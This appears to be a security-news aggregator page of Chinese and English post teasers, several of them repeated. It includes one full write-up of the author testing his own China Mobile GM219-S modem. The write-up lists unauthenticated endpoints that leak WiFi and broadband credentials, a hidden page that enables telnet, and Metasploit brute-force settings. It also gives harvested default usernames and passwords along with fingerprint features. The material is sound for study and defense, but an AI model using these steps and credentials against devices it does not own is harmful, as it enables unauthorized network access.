路由器漏洞挖掘之栈溢出入门(三)-- ROP 链的构造 - H4lo
前言 DVRF 的第二个栈溢出程序是 stack_bof_2,这题和上一道题的差异就在于这道题没有给我们后门函数, 需要自己构造 shellcode 来进行调用。 README 文件里也做了说明,所以这里的重点 是 ROP 链的构造以及 sleep(1) 的用法。 确定偏移 和上一道题一样,首先我们
Aggregator
关于机器人流量对抗的一点感想 - r00tgrok
6 years 1 month ago
前两天看到一个朋友发的招人贴,兴趣之余点进去看了一下,看到的第一个岗位是资深信息安全工程师/高级专家(人机识别),顿时引起了我的注意。 简要描述一下: 岗位职责:1、负责机器人流量识别与数据分析 2、负责人机识别系统技术设计与实现 岗位定级:P6-P8 工作地点:上海/杭州/北京 印象中多次看到过他
r00tgrok
MLSRC助力看雪CTF 晋级赛,battle起来!
6 years 1 month ago
2019 看雪CTF晋级赛Q1 已正式开启!
MLSRC助力看雪CTF 晋级赛,battle起来!
6 years 1 month ago
2019 看雪CTF晋级赛Q1 已正式开启!
Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics
6 years 1 month ago
Free apps have a lot of appeal for users. They don’t cost a cent and can help users complete tasks...
The post Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics appeared first on McAfee Blog.
McAfee
“CryptoSink” Campaign Deploys a New Miner Malware
6 years 1 month ago
Attackers continue to exploit old vulnerabilities, use new methods to kill competing crypto-miners, and survive removal by administrators.
随笔:Gartner 最新《安全威胁情报产品&服务市场指南报告》
6 years 1 month ago
几年以前,我个人对威胁情报的理解还局限于:它是业界安全理念变革背景下演变出的重要安全能力。随着近几年的了解,威胁情报也处在自身产品的发展阶段,尤其是和安全运营领域的深度结合。
Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in February 2019
6 years 1 month ago
Continuing the trend from January, threat actor activity in February focused heavily on exploiting a ThinkPHP remote code execution vulnerability.
March 2019 Security Update Release
6 years 1 month ago
Today, we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to turn on automatic updates.
More information about this month’s security updates can be found on the Security Update Guide.
March 2019 Security Update Release
6 years 1 month ago
Today, we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to turn on automatic updates.
More information about this month’s security updates can be found on the Security Update Guide.
【红蓝对抗】大型互联网企业安全蓝军建设
6 years 1 month ago
KINGX
【红蓝对抗】大型互联网企业安全蓝军建设
6 years 1 month ago
从渗透方向的红蓝攻防演练切入,分享关于互联网企业基础安全中蓝军建设的一点经验和想法。
【红蓝对抗】大型互联网企业安全蓝军建设
6 years 1 month ago
从渗透方向的红蓝攻防演练切入,分享关于互联网企业基础安全中蓝军建设的一点经验和想法。
记一次移动光猫(GM219-S)安全测试
6 years 1 month ago
前言
过个年,WiFi密码忘记了…光猫管理密码也忘记了(这个光猫也不支持物理按钮重置设置),但是手机还连着WiFi,正规操作找回不了密码,那就用咱们测试的思维来试试PWN掉这个路由器。
过程 未授权获取WiFi连接密码还好之前没闲着,发现管理的几个未授权访问的接口如下:
获取宽带账号密码: /GET_USER_WAN_PPP_INFO.json
获取 WLAN 连接信息: /GET_WLAN_LINK_INFO.json
获取 DHCP 信息: /GET_NET_DHCP_INFO.json
手机访问 http://192.168.1.1/GET_WLAN_LINK_INFO.json ,获取密码:xxx,电脑连接登录
信息收集 端口收集结果 Scanning promote.cache-dns.local (192.168.1.1) [1080 ports] Discovered open port 80/tcp on 192.168.1.1 Discovered open port 8080/tcp on 192.168.1.1 目录扫描结果获得的一些目录:
/login.html /login.asp /index.asp /telnet.asp /upgrade.asp ... 突破口在目录扫描的时候,发现/telnet.asp -> 跳转到 /cgi-bin/telnet.asp 如下图所示界面:
这个功能可以开启光猫的telnet服务,先开启,然后再使用Nmap扫描下端口:
Scanning promote.cache-dns.local (192.168.1.1) [1080 ports] Discovered open port 8080/tcp on 192.168.1.1 Discovered open port 80/tcp on 192.168.1.1 Discovered open port 8023/tcp on 192.168.1.1发现多了个8023端口,其对应的服务果然是telnet:
8023/tcp open telnet | fingerprint-strings: | GenericLines: | Star-Net Broadband Router | Login: | Password: | GetRequest: | Star-Net Broadband Router | Login: GET / HTTP/1.0 | Password: | Help: | HELP | Star-Net Broadband Router | Login: Password: | NCP: | Star-Net Broadband Router | Login: DmdT^@^@^@ | ^@^@^@^A^@^@^@^@^@ | NULL: | Star-Net Broadband Router | Login: | RPCCheck: | Star-Net Broadband Router | Login: | ^@^@(r | SIPOptions: | Star-Net Broadband Router | Login: OPTIONS sip:nm SIP/2.0 | Via: SIP/2.0/TCP nm;branch=foo | From: <sip:nm@nm>;tag=root | <sip:nm2@nm2> | Call-ID: 50000 | CSeq: 42 OPTIONS | Max-Forwards: 70 | Content-Length: 0 | Contact: <sip:nm@nm> | Accept: application/sdp | Password: | tn3270: | ^@IBM-3279-4-E | ^YStar-Net Broadband Router |_ Login:telnet开启,爆破一波走起。(Caimima生成个密码口令)
试了nmap貌似没啥用,开个msfconsole来爆破:
use auxiliary/scanner/telnet/telnet_login set RHOSTS 192.168.1.1 #设置模板 set RPORT 8023 #设置端口 set USER_FILE /root/user.txt #设置用户字典 set PASS_FILE /root/pass.txt #设置密码字典 exploit 192.168.1.1 #启动幸运的是爆破出来了,是组合弱口令:
获取密码运行telnet 192.168.1.1 8023输入账号密码进去,执行sh发现可以直接进入shell:
接下来就是找密码到处瞎翻(没有PWN路由器的经验,很难受),执行 ls -a -l 发现有软链接,很多指向了/tmp目录:
于是进入/tmp目录,到处翻腾:
利用这几个关键词看看是否有文件中包含了:admin、CMCC(中国移动)、password、user
e.g. grep 'admin' ./*,等了老半天了,发现/tmp/ctromfile.cfg文件内有点东西:
复制密码登录,怼进去:
信息整合做完测试并针对测试过程的信息进行整合,最后形成字典以便后面再次遇到~
-
通过读配置文件获取的一系列用户名、密码:9vvrr、admin、aDm8H%MdA、CMCCAdmin、telnetuser、user
- 文件、目录路径:
- /GET_USER_WAN_PPP_INFO.json
- /GET_WLAN_LINK_INFO.json
- /GET_NET_DHCP_INFO.json
- /telnet.asp
- /index.asp
- /user.html
- /upgrade.asp
- /cgi-bin/
- /content.asp
- 指纹特征:
- 标题:HGU LOGIN
- 图片:/webstyle/images/login-mobile-qrcode-anhui.png -> 23cb4f5e63e0cd47f8788a6ca3558eab
- JS:/webstyle/js/br_login_nc.js
最后我只是默默的把user用户密码改了一下~
红队与理论:Credential Relay 与 EPA
6 years 1 month ago
Credential Relay 与相关防御方案
红队与理论:Credential Relay 与 EPA
6 years 1 month ago
Credential Relay 与相关防御方案
红队与理论:Credential Relay 与 EPA
6 years 1 month ago
Credential Relay 与相关防御方案
红队与理论:Credential Relay 与 EPA
6 years 1 month ago
Credential Relay 与相关防御方案
红队与理论:Credential Relay 与 EPA
6 years 1 month ago
Credential Relay 与相关防御方案
红队与理论:Credential Relay 与 EPA
6 years 1 month ago
Credential Relay 与相关防御方案